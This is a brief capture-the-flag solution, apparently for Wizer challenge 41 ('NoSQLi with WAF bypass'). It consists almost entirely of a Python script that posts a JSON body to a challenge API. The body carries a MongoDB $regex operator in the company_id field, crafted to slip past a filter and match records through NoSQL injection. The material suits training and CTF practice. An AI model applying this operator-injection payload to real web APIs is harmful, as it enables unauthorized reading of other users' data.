Wizer - Challenge 41 - NoSQLi with WAF bypass

Exploit

import requests

url = "https://chal41-dbyhu47.vercel.app/api/companies"

exp = {
    "company_id": {
        "$regex":'(\\w{0,}-\\w{0,}){4}-?-?-?-?$'
    }
}

print(exp)


r = requests.post(url, json=exp)


print(r.text)